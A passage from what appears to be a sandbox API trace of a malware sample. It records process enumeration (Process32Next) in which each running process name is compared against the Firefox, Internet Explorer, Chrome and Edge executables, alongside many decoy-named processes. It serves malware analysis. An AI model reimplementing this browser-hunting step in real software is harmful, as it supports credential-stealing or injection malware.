lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0256.787] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0256.788] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0256.788] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0256.788] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0256.788] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.788] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0256.788] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0256.788] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0256.788] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0256.788] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.788] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0256.789] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0256.789] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0256.789] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0256.789] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.789] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0256.790] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0256.790] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0256.790] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0256.790] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.790] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0256.790] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0256.790] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0256.790] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0256.790] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.790] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0256.791] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0256.791] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0256.791] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0256.791] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.791] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0256.791] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0256.791] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0256.791] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0256.791] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.791] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0256.792] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0256.792] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0256.792] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0256.792] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.792] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.792] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0256.792] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0256.792] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0256.792] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.792] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.793] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0256.793] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0256.793] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0256.793] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.793] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.793] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0256.793] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0256.793] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0256.794] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.794] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.794] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0256.794] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0256.794] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0256.794] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.794] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.795] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0256.795] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0256.795] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0256.795] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.795] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0256.795] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0256.795] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0256.795] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0256.795] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.795] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.796] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0256.796] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0256.796] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0256.796] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.796] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.796] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0256.796] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0256.796] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0256.796] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.796] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0256.797] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0256.797] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0256.797] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0256.797] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.797] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0256.797] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0256.797] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0256.797] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0256.797] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.797] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0256.798] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0256.798] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0256.798] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0256.798] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.798] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.798] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0256.798] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0256.799] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0256.799] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.799] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0256.799] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0256.799] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0256.799] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0256.799] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.799] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0256.800] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0256.800] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0256.800] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0256.800] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.800] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0256.801] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0256.801] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0256.801] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0256.801] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.801] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0256.801] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0256.801] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0256.801] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0256.801] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.801] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0256.802] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0256.802] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0256.802] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0256.802] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.802] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0256.802] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0256.802] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0256.802] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0256.802] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.802] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0256.803] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0256.803] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0256.803] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0256.803] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.803] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0256.803] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0256.803] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0256.804] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0256.804] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.804] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0256.804] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0256.804] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0256.804] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0256.804] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.804] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0256.805] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0256.805] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0256.805] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0256.805] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.805] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0256.805] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0256.805] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0256.805] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0256.805] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.805] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0256.806] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0256.806] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0256.806] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0256.806] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.806] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0256.806] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0256.806] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0256.806] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0256.806] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.806] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0256.807] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0256.807] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0256.807] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0256.807] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.807] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0256.807] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0256.807] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0256.807] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0256.808] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.808] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0256.808] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0256.808] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0256.808] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0256.808] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.808] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0256.809] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0256.809] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0256.809] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0256.809] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.809] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0256.809] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0256.809] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0256.809] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0256.809] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.809] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0256.810] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0256.810] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0256.810] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0256.810] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.810] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0256.810] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0256.810] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0256.810] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0256.810] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.810] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0256.811] lstrcmpiA (lpString1="doctrine alcohol.exe", 